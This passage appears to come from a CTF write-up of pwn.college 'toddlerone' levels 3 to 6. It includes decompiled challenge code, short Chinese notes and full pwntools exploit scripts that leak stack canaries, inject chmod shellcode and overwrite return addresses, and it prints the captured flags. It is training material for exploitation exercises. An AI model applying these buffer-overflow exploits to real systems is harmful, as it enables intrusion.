        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def leak_data(target):
    try:
        target.sendlineafter(b"Payload size: ", trigger_length)
        send_payload(target, backdoor_trigger)
        target.recvuntil(backdoor)

        canary = b"\x00" + target.recv(0x7)
        rbp = target.recv(0x6)
        log.success(f"Canary: {to_hex_bytes(canary)}\nRBP: {to_hex_bytes(rbp)}")

        return [canary, rbp]
    except Exception as e:
        log.exception(f"An error occurred while leaking canary: {e}")


def construct_payload(target, padding_size):
    canary, rbp = leak_data(target)
    rbp = int.from_bytes(rbp, "little")

    ret_addr = rbp - fixed_offset

    shellcode = asm(shellcraft.chmod("f", 0o4))
    shellcode_length = len(shellcode)
    shellcode += b"".ljust(padding_size - shellcode_length, b"A")
    shellcode += canary
    shellcode += padding_to_ret
    shellcode += p64(ret_addr)

    return shellcode


def attack(target, payload):
    try:
        os.system("ln -s /flag f")

        payload_size = f"{len(payload)}".encode()
        target.sendlineafter(b"Payload size: ", payload_size)

        target.recvuntil(b"Send your payload")
        send_payload(target, payload)
        target.recvall(timeout=5)

        try:
            with open("./f", "r") as file:
                content = file.read()

                log.success(content)
                return True
        except FileNotFoundError:
            log.exception("The file './f' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read './f'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload(target, padding_size)

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{IDpfJ24swVO_Q0TAY9ajONzKHTe.01MyMDL5cTNxgzW}

Level 3.1

Information

Category: Pwn

Description

Write a full exploit involving injecting shellcode and a method of tricking the challenge into executing it by utilizing clever payload construction.

Write-up

参见 Level 3.0。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    asm,
    context,
    gdb,
    log,
    os,
    p64,
    process,
    remote,
    shellcraft,
)

context(log_level="debug", terminal="kitty")

FILE = "./toddlerone-level-3-1"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""

backdoor = b"REPEAT "
padding_size = 0x58
backdoor_trigger = b"".ljust(padding_size - len(backdoor) + 1, b"A") + backdoor
trigger_length = str(len(backdoor_trigger))
padding_to_ret = b"".ljust(0x8, b"A")
fixed_offset = 0x1150


def to_hex_bytes(data):
    return "".join(f"\\x{byte:02x}" for byte in data)


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def leak_data(target):
    try:
        target.sendlineafter(b"Payload size: ", trigger_length)
        send_payload(target, backdoor_trigger)
        target.recvuntil(backdoor)

        canary = b"\x00" + target.recv(0x7)
        rbp = target.recv(0x6)
        log.success(f"Canary: {to_hex_bytes(canary)}\nRBP: {to_hex_bytes(rbp)}")

        return [canary, rbp]
    except Exception as e:
        log.exception(f"An error occurred while leaking canary: {e}")


def construct_payload(target, padding_size):
    canary, rbp = leak_data(target)
    rbp = int.from_bytes(rbp, "little")

    ret_addr = rbp - fixed_offset

    shellcode = asm(shellcraft.chmod("f", 0o4))
    shellcode_length = len(shellcode)
    shellcode += b"".ljust(padding_size - shellcode_length, b"A")
    shellcode += canary
    shellcode += padding_to_ret
    shellcode += p64(ret_addr)

    return shellcode


def attack(target, payload):
    try:
        os.system("ln -s /flag f")

        payload_size = f"{len(payload)}".encode()
        target.sendlineafter(b"Payload size: ", payload_size)

        target.recvuntil(b"Send your payload")
        send_payload(target, payload)
        target.recvall(timeout=5)

        try:
            with open("./f", "r") as file:
                content = file.read()

                log.success(content)
                return True
        except FileNotFoundError:
            log.exception("The file './f' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read './f'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload(target, padding_size)

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{w1Gz9LGRK9kmwUD7TZnA3xcKN5j.0FNyMDL5cTNxgzW}

Level 4.0

Information

Category: Pwn

Description

Write a full exploit involving injecting shellcode, reverse engineering, and a method of tricking the challenge into executing your payload.

Write-up

__int64 __fastcall challenge(unsigned int a1, __int64 a2, __int64 a3)
{
  int *v3; // rax
  char *v4; // rax
  __int64 v6; // [rsp+0h] [rbp-A0h] BYREF
  __int64 v7; // [rsp+8h] [rbp-98h]
  __int64 v8; // [rsp+10h] [rbp-90h]
  unsigned int v9; // [rsp+1Ch] [rbp-84h]
  int v10; // [rsp+2Ch] [rbp-74h]
  size_t nbytes; // [rsp+30h] [rbp-70h] BYREF
  void *buf; // [rsp+38h] [rbp-68h]
  _QWORD v13[9]; // [rsp+40h] [rbp-60h] BYREF
  __int64 v14; // [rsp+88h] [rbp-18h]
  unsigned __int64 v15; // [rsp+98h] [rbp-8h]
  __int64 savedregs; // [rsp+A0h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+A8h] [rbp+8h] BYREF

  v9 = a1;
  v8 = a2;
  v7 = a3;
  v15 = __readfsqword(0x28u);
  memset(v13, 0, sizeof(v13));
  v14 = 0LL;
  buf = v13;
  nbytes = 0LL;
  puts("The challenge() function has just been launched!");
  sp_ = (__int64)&v6;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)&v6) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
  DUMP_STACK(sp_, sz_);
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
  puts("including the saved base pointer and the saved return address, for a");
  printf("total of %d bytes.\n", 8 * sz_);
  printf("The input buffer begins at %p, partway through the stack frame,\n", buf);
  puts("(\"above\" it in the stack are other local variables used by the function).");
  puts("Your input will be read into this buffer.");
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 70);
  puts("large input length, and thus overflow the buffer.\n");
  puts("We have disabled the following standard memory corruption mitigations for this challenge:");
  puts("- the stack is executable. This means that if the stack contains shellcode");
  puts("and you overwrite the return address with the address of that shellcode, it will execute.\n");
  cp_ = bp_;
  cv_ = __readfsqword(0x28u);
  while ( *(_QWORD *)cp_ != cv_ )
    cp_ -= 8LL;
  printf("Payload size: ");
  __isoc99_scanf("%lu", &nbytes);
  printf("You have chosen to send %lu bytes of input!\n", nbytes);
  printf("This will allow you to write from %p (the start of the input buffer)\n", buf);
  printf(
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
    (char *)buf + nbytes,
    nbytes - 70);
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
  v10 = read(0, buf, nbytes);
  if ( v10 < 0 )
  {
    v3 = __errno_location();
    v4 = strerror(*v3);
    printf("ERROR: Failed to read input -- %s!\n", v4);
    exit(1);
  }
  printf("You sent %d bytes!\n", v10);
  puts("Let's see what happened with the stack:\n");
  DUMP_STACK(sp_, sz_);
  puts("The program's memory status:");
  printf("- the input buffer starts at %p\n", buf);
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
  printf("- the canary is stored at %p.\n", (const void *)cp_);
  printf("- the canary value is now %p.\n", *(const void **)cp_);
  putchar(10);
  printf("You said: %s\n", (const char *)buf);
  puts("This challenge has a trick hidden in its code. Reverse-engineer the binary right after this puts()");
  puts("call to see the hidden backdoor!");
  if ( strstr((const char *)buf, "REPEAT") )
  {
    puts("Backdoor triggered! Repeating challenge()");
    return challenge(v9, v8, v7);
  }
  else
  {
    puts("Goodbye!");
    puts("This challenge will, by default, exit() instead of returning from the");
    puts("challenge function. When a process exit()s, it ceases to exist immediately,");
    puts("and no amount of overwritten return addresses will let you hijack its control");
    puts("flow. You will have to reverse engineer the program to understand how to avoid");
    puts("making this challenge exit(), and allow it to return normally.");
    if ( v14 != 0x49954B5EFDCB2A29LL )
    {
      puts("exit() condition triggered. Exiting!");
      exit(42);
    }
    puts("exit() condition avoided! Continuing execution.");
    return 0LL;
  }
}

很简单吧，令 v14 == 0x49954B5EFDCB2A29 才可以返回到我们的 shellcode。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    asm,
    context,
    gdb,
    log,
    os,
    p64,
    process,
    remote,
    shellcraft,
)

context(log_level="debug", terminal="kitty")

FILE = "./toddlerone-level-4-0"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""

backdoor = b"REPEAT "
padding_size = 0x58
padding_to_v14_size = 0x48
backdoor_trigger = b"".ljust(padding_size - len(backdoor) + 1, b"A") + backdoor
trigger_length = str(len(backdoor_trigger))
padding_to_canary = b"".ljust(0x8, b"A")
padding_to_ret = b"".ljust(0x8, b"A")
v14 = p64(0x49954B5EFDCB2A29)
fixed_offset = 0x1150


def to_hex_bytes(data):
    return "".join(f"\\x{byte:02x}" for byte in data)


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def leak_data(target):
    try:
        target.sendlineafter(b"Payload size: ", trigger_length)
        send_payload(target, backdoor_trigger)
        target.recvuntil(backdoor)

        canary = b"\x00" + target.recv(0x7)
        rbp = target.recv(0x6)
        log.success(f"Canary: {to_hex_bytes(canary)}\nRBP: {to_hex_bytes(rbp)}")

        return [canary, rbp]
    except Exception as e:
        log.exception(f"An error occurred while leaking canary: {e}")


def construct_payload(target):
    canary, rbp = leak_data(target)
    rbp = int.from_bytes(rbp, "little")

    ret_addr = rbp - fixed_offset

    shellcode = asm(shellcraft.chmod("f", 0o4))
    shellcode_length = len(shellcode)
    shellcode += b"".ljust(padding_to_v14_size - shellcode_length, b"A")
    shellcode += v14
    shellcode += padding_to_canary
    shellcode += canary
    shellcode += padding_to_ret
    shellcode += p64(ret_addr)

    return shellcode


def attack(target, payload):
    try:
        os.system("ln -s /flag f")

        payload_size = f"{len(payload)}".encode()
        target.sendlineafter(b"Payload size: ", payload_size)

        target.recvuntil(b"Send your payload")
        send_payload(target, payload)
        response = target.recvall(timeout=5)
        log.debug(response.decode("utf-8", errors="ignore"))

        try:
            with open("./f", "r") as file:
                content = file.read()

                log.success(content)
                return True
        except FileNotFoundError:
            log.exception("The file './f' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read './f'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload(target)

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{ECpb0UATZ-UymShuFolh7qzxgrx.0VNyMDL5cTNxgzW}

Level 4.1

Information

Category: Pwn

Description

Write a full exploit involving injecting shellcode, reverse engineering, and a method of tricking the challenge into executing your payload.

Write-up

参见 Level 4.0。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    asm,
    context,
    gdb,
    log,
    os,
    p64,
    process,
    remote,
    shellcraft,
)

context(log_level="debug", terminal="kitty")

FILE = "./toddlerone-level-4-1"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""

backdoor = b"REPEAT "
padding_size = 0x58
padding_to_v14_size = 0x50
backdoor_trigger = b"".ljust(padding_size - len(backdoor) + 1, b"A") + backdoor
trigger_length = str(len(backdoor_trigger))
padding_to_ret = b"".ljust(0x8, b"A")
v14 = p64(0x736E2B681CA77DD2)
fixed_offset = 0x1150


def to_hex_bytes(data):
    return "".join(f"\\x{byte:02x}" for byte in data)


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def leak_data(target):
    try:
        target.sendlineafter(b"Payload size: ", trigger_length)
        send_payload(target, backdoor_trigger)
        target.recvuntil(backdoor)

        canary = b"\x00" + target.recv(0x7)
        rbp = target.recv(0x6)
        log.success(f"Canary: {to_hex_bytes(canary)}\nRBP: {to_hex_bytes(rbp)}")

        return [canary, rbp]
    except Exception as e:
        log.exception(f"An error occurred while leaking canary: {e}")


def construct_payload(target):
    canary, rbp = leak_data(target)
    rbp = int.from_bytes(rbp, "little")

    ret_addr = rbp - fixed_offset

    shellcode = asm(shellcraft.chmod("f", 0o4))
    shellcode_length = len(shellcode)
    shellcode += b"".ljust(padding_to_v14_size - shellcode_length, b"A")
    shellcode += v14
    shellcode += canary
    shellcode += padding_to_ret
    shellcode += p64(ret_addr)

    return shellcode


def attack(target, payload):
    try:
        os.system("ln -s /flag f")

        payload_size = f"{len(payload)}".encode()
        target.sendlineafter(b"Payload size: ", payload_size)

        target.recvuntil(b"Send your payload")
        send_payload(target, payload)
        response = target.recvall(timeout=5)
        log.debug(response.decode("utf-8", errors="ignore"))

        try:
            with open("./f", "r") as file:
                content = file.read()

                log.success(content)
                return True
        except FileNotFoundError:
            log.exception("The file './f' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read './f'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload(target)

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{UiJc7-6JI988NELrbF-uNpbwc-X.0lNyMDL5cTNxgzW}

Level 5.0

Information

Category: Pwn

Description

Write a full exploit involving injecting shellcode, reverse engineering, seccomp, and a method of tricking the challenge into executing your payload.

Write-up

__int64 __fastcall challenge(unsigned int a1, __int64 a2, __int64 a3)
{
  int *v3; // rax
  char *v4; // rax
  unsigned int v6; // ebx
  const char *v7; // rax
  __int64 v8; // [rsp+0h] [rbp-E0h] BYREF
  __int64 v9; // [rsp+8h] [rbp-D8h]
  __int64 v10; // [rsp+10h] [rbp-D0h]
  unsigned int v11; // [rsp+1Ch] [rbp-C4h]
  int i; // [rsp+28h] [rbp-B8h]
  int v13; // [rsp+2Ch] [rbp-B4h]
  size_t nbytes; // [rsp+30h] [rbp-B0h] BYREF
  void *buf; // [rsp+38h] [rbp-A8h]
  _QWORD *v16; // [rsp+40h] [rbp-A0h]
  __int64 v17; // [rsp+48h] [rbp-98h]
  _QWORD v18[18]; // [rsp+50h] [rbp-90h] BYREF
  __int64 savedregs; // [rsp+E0h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+E8h] [rbp+8h] BYREF

  v11 = a1;
  v10 = a2;
  v9 = a3;
  v18[15] = __readfsqword(0x28u);
  memset(v18, 0, 0x78uLL);
  buf = v18;
  v16 = &v18[14];
  nbytes = 0LL;
  v18[14] = 0xE700000001LL;
  puts("The challenge() function has just been launched!");
  sp_ = (__int64)&v8;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)&v8) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
  DUMP_STACK(sp_, sz_);
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
  puts("including the saved base pointer and the saved return address, for a");
  printf("total of %d bytes.\n", 8 * sz_);
  printf("The input buffer begins at %p, partway through the stack frame,\n", buf);
  puts("(\"above\" it in the stack are other local variables used by the function).");
  puts("Your input will be read into this buffer.");
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 103);
  puts("large input length, and thus overflow the buffer.\n");
  puts("We have disabled the following standard memory corruption mitigations for this challenge:");
  puts("- the stack is executable. This means that if the stack contains shellcode");
  puts("and you overwrite the return address with the address of that shellcode, it will execute.\n");
  cp_ = bp_;
  cv_ = __readfsqword(0x28u);
  while ( *(_QWORD *)cp_ != cv_ )
    cp_ -= 8LL;
  printf("Payload size: ");
  __isoc99_scanf("%lu", &nbytes);
  printf("You have chosen to send %lu bytes of input!\n", nbytes);
  printf("This will allow you to write from %p (the start of the input buffer)\n", buf);
  printf(
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
    (char *)buf + nbytes,
    nbytes - 103);
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
  v13 = read(0, buf, nbytes);
  if ( v13 < 0 )
  {
    v3 = __errno_location();
    v4 = strerror(*v3);
    printf("ERROR: Failed to read input -- %s!\n", v4);
    exit(1);
  }
  printf("You sent %d bytes!\n", v13);
  puts("Let's see what happened with the stack:\n");
  DUMP_STACK(sp_, sz_);
  puts("The program's memory status:");
  printf("- the input buffer starts at %p\n", buf);
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
  printf("- the canary is stored at %p.\n", (const void *)cp_);
  printf("- the canary value is now %p.\n", *(const void **)cp_);
  putchar(10);
  printf("You said: %s\n", (const char *)buf);
  puts("This challenge has a trick hidden in its code. Reverse-engineer the binary right after this puts()");
  puts("call to see the hidden backdoor!");
  if ( strstr((const char *)buf, "REPEAT") )
  {
    puts("Backdoor triggered! Repeating challenge()");
    return challenge(v11, v10, v9);
  }
  else
  {
    puts("This challenge will, by default, initialize a seccomp filter jail before exiting");
    puts("the challenge function. You will have to reverse engineer the program to");
    puts("understand how to avoid this.");
    if ( v18[13] == 0x484D17DF2438CECFLL )
    {
      puts("Jail avoided! Continuing execution.");
    }
    else
    {
      puts("Restricting system calls (default: kill)");
      v17 = seccomp_init(0LL);
      for ( i = 0; i <= 1; ++i )
      {
        v6 = *((_DWORD *)v16 + i);
        v7 = (const char *)seccomp_syscall_resolve_num_arch(0LL, v6);
        printf("Allowing syscall: %s (number %i)\n", v7, v6);
        if ( (unsigned int)seccomp_rule_add(v17, 2147418112LL, *((unsigned int *)v16 + i), 0LL) )
          __assert_fail(
            "seccomp_rule_add(ctx, SCMP_ACT_ALLOW, syscalls_allowed[i], 0) == 0",
            "/challenge/toddlerone-level-5-0.c",
            0x9Eu,
            "challenge");
      }
      if ( (unsigned int)seccomp_load(v17) )
        __assert_fail("seccomp_load(ctx) == 0", "/challenge/toddlerone-level-5-0.c", 0xA1u, "challenge");
    }
    puts("Goodbye!");
    return 0LL;
  }
}

我本以为是要 bypass seccomp 的题，没想到根本用不着动脑子……

令 v18[13] == 0x484D17DF2438CECF seccomp 就形同虚设了。试问这题和前面两题有啥区别吗，是不是这题就是个引子，后面有真正的 seccomp 玩呀 LOL

值得注意的是这里我们泄漏出来的 rbp 并不是真正的 rbp，而是一些其它的栈内数据，它后面也有别的返回地址，不过都覆盖掉好像也没啥问题，目的达到了就好～

我只是想说，我懒得改变量名了，总之解释清楚别误解了就好哈哈哈。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    asm,
    context,
    gdb,
    log,
    os,
    p64,
    process,
    remote,
    shellcraft,
)

context(log_level="debug", terminal="kitty")

FILE = "./toddlerone-level-5-0"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""

backdoor = b"REPEAT "
padding_size = 0x78
padding_to_v18_size = 0x68
backdoor_trigger = b"".ljust(padding_size - len(backdoor) + 1, b"A") + backdoor
trigger_length = str(len(backdoor_trigger))
padding_to_canary = b"".ljust(0x8, b"A")
padding_to_ret = b"".ljust(0x18, b"A")
v18 = p64(0x484D17DF2438CECF)
fixed_offset = 0x11C0


def to_hex_bytes(data):
    return "".join(f"\\x{byte:02x}" for byte in data)


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def leak_data(target):
    try:
        target.sendlineafter(b"Payload size: ", trigger_length)
        send_payload(target, backdoor_trigger)
        response = target.recvuntil(backdoor)
        log.debug(response.decode("utf-8", errors="ignore"))

        canary = b"\x00" + target.recv(0x7)
        rbp = target.recv(0x6)
        log.success(f"Canary: {to_hex_bytes(canary)}\nRBP: {to_hex_bytes(rbp)}")

        return [canary, rbp]
    except Exception as e:
        log.exception(f"An error occurred while leaking canary: {e}")


def construct_payload(target):
    canary, rbp = leak_data(target)
    rbp = int.from_bytes(rbp, "little")

    ret_addr = rbp - fixed_offset

    shellcode = asm(shellcraft.chmod("f", 0o4))
    shellcode_length = len(shellcode)
    shellcode += b"".ljust(padding_to_v18_size - shellcode_length, b"A")
    shellcode += v18
    shellcode += padding_to_canary
    shellcode += canary
    shellcode += padding_to_ret
    shellcode += p64(ret_addr)

    return shellcode


def attack(target, payload):
    try:
        os.system("ln -s /flag f")

        payload_size = f"{len(payload)}".encode()
        target.sendlineafter(b"Payload size: ", payload_size)

        target.recvuntil(b"Send your payload")
        send_payload(target, payload)
        response = target.recvall(timeout=5)
        log.debug(response.decode("utf-8", errors="ignore"))

        try:
            with open("./f", "r") as file:
                content = file.read()

                log.success(content)
                return True
        except FileNotFoundError:
            log.exception("The file './f' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read './f'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload(target)

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{k8hu05Nam_pIp8PRsZsT8XQmYSZ.01NyMDL5cTNxgzW}

Level 5.1

Information

Category: Pwn

Description

Write a full exploit involving injecting shellcode, reverse engineering, seccomp, and a method of tricking the challenge into executing your payload.

Write-up

参见 Level 5.0。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    asm,
    context,
    gdb,
    log,
    os,
    p64,
    process,
    remote,
    shellcraft,
)

context(log_level="debug", terminal="kitty")

FILE = "./toddlerone-level-5-1"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""

backdoor = b"REPEAT "
padding_size = 0x58
padding_to_v13_size = 0x40
backdoor_trigger = b"".ljust(padding_size - len(backdoor) + 1, b"A") + backdoor
trigger_length = str(len(backdoor_trigger))
padding_to_canary = b"".ljust(0x10, b"A")
padding_to_ret = b"".ljust(0x8, b"A")
v13 = p64(0x4887233ABFEDC049)
fixed_offset = 0x1160


def to_hex_bytes(data):
    return "".join(f"\\x{byte:02x}" for byte in data)


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def leak_data(target):
    try:
        target.sendlineafter(b"Payload size: ", trigger_length)
        send_payload(target, backdoor_trigger)
        response = target.recvuntil(backdoor)
        log.debug(response.decode("utf-8", errors="ignore"))

        canary = b"\x00" + target.recv(0x7)
        rbp = target.recv(0x6)
        log.success(f"Canary: {to_hex_bytes(canary)}\nRBP: {to_hex_bytes(rbp)}")

        return [canary, rbp]
    except Exception as e:
        log.exception(f"An error occurred while leaking canary: {e}")


def construct_payload(target):
    canary, rbp = leak_data(target)
    rbp = int.from_bytes(rbp, "little")

    ret_addr = rbp - fixed_offset

    shellcode = asm(shellcraft.chmod("f", 0o4))
    shellcode_length = len(shellcode)
    shellcode += b"".ljust(padding_to_v13_size - shellcode_length, b"A")
    shellcode += v13
    shellcode += padding_to_canary
    shellcode += canary
    shellcode += padding_to_ret
    shellcode += p64(ret_addr)

    return shellcode


def attack(target, payload):
    try:
        os.system("ln -s /flag f")

        payload_size = f"{len(payload)}".encode()
        target.sendlineafter(b"Payload size: ", payload_size)

        target.recvuntil(b"Send your payload")
        send_payload(target, payload)
        response = target.recvall(timeout=5)
        log.debug(response.decode("utf-8", errors="ignore"))

        try:
            with open("./f", "r") as file:
                content = file.read()

                log.success(content)
                return True
        except FileNotFoundError:
            log.exception("The file './f' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read './f'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload(target)

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{w8_cw1WNbjdmbd10XDPrPKfumT5.0FOyMDL5cTNxgzW}

Level 6.0

Information

Category: Pwn

Description

Write a full exploit involving injecting shellcode, reverse engineering, seccomp, and a method of tricking the challenge into executing your payload.

Write-up

__int64 __fastcall challenge(unsigned int a1, __int64 a2, __int64 a3)
{
  int *v3; // rax
  char *v4; // rax
  unsigned int v6; // ebx
  const char *v7; // rax
  __int64 v8; // [rsp+0h] [rbp-F0h] BYREF
  __int64 v9; // [rsp+8h] [rbp-E8h]
  __int64 v10; // [rsp+10h] [rbp-E0h]
  unsigned int v11; // [rsp+1Ch] [rbp-D4h]
  int i; // [rsp+28h] [rbp-C8h]
  int v13; // [rsp+2Ch] [rbp-C4h]
  size_t nbytes; // [rsp+30h] [rbp-C0h] BYREF
  void *buf; // [rsp+38h] [rbp-B8h]
  _DWORD *v16; // [rsp+40h] [rbp-B0h]
  __int64 v17; // [rsp+48h] [rbp-A8h]
  _DWORD v18[34]; // [rsp+50h] [rbp-A0h] BYREF
  unsigned __int64 v19; // [rsp+D8h] [rbp-18h]
  __int64 savedregs; // [rsp+F0h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+F8h] [rbp+8h] BYREF

  v11 = a1;
  v10 = a2;
  v9 = a3;
  v19 = __readfsqword(0x28u);
  memset(v18, 0, 0x78uLL);
  buf = v18;
  v16 = &v18[29];
  nbytes = 0LL;
  v18[29] = 1;
  v18[30] = 231;
  puts("The challenge() function has just been launched!");
  sp_ = (__int64)&v8;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)&v8) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
  DUMP_STACK(sp_, sz_);
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
  puts("including the saved base pointer and the saved return address, for a");
  printf("total of %d bytes.\n", 8 * sz_);
  printf("The input buffer begins at %p, partway through the stack frame,\n", buf);
  puts("(\"above\" it in the stack are other local variables used by the function).");
  puts("Your input will be read into this buffer.");
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 114);
  puts("large input length, and thus overflow the buffer.\n");
  puts("We have disabled the following standard memory corruption mitigations for this challenge:");
  puts("- the stack is executable. This means that if the stack contains shellcode");
  puts("and you overwrite the return address with the address of that shellcode, it will execute.\n");
  cp_ = bp_;
  cv_ = __readfsqword(0x28u);
  while ( *(_QWORD *)cp_ != cv_ )
    cp_ -= 8LL;
  printf("Payload size: ");
  __isoc99_scanf("%lu", &nbytes);
  printf("You have chosen to send %lu bytes of input!\n", nbytes);
  printf("This will allow you to write from %p (the start of the input buffer)\n", buf);
  printf(
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
    (char *)buf + nbytes,
    nbytes - 114);
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
  v13 = read(0, buf, nbytes);
  if ( v13 < 0 )
  {
    v3 = __errno_location();
    v4 = strerror(*v3);
    printf("ERROR: Failed to read input -- %s!\n", v4);
    exit(1);
  }
  printf("You sent %d bytes!\n", v13);
  puts("Let's see what happened with the stack:\n");
  DUMP_STACK(sp_, sz_);
  puts("The program's memory status:");
  printf("- the input buffer starts at %p\n", buf);
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
